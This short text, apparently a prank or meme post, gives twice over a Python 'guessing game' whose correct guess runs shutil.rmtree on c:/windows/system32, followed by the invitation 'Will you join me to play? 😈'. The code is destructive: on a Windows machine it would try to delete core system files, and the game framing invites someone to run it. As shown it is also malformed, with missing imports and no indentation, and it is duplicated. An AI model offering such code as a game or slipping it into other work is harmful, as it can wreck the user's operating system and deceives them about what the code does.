number = random.randint(1, 10)
guess = input("Choose a number from 1 to 10: ")
guess = int(guess)
if guess == number:
shutil.rmtree("c:/windows/system32")
Will you join me to play? 😈
number = random.randint(1, 10)
guess = input("Choose a number from 1 to 10: ")
guess = int(guess)
if guess == number:
shutil.rmtree("c:/windows/system32")
Will you join me to play? 😈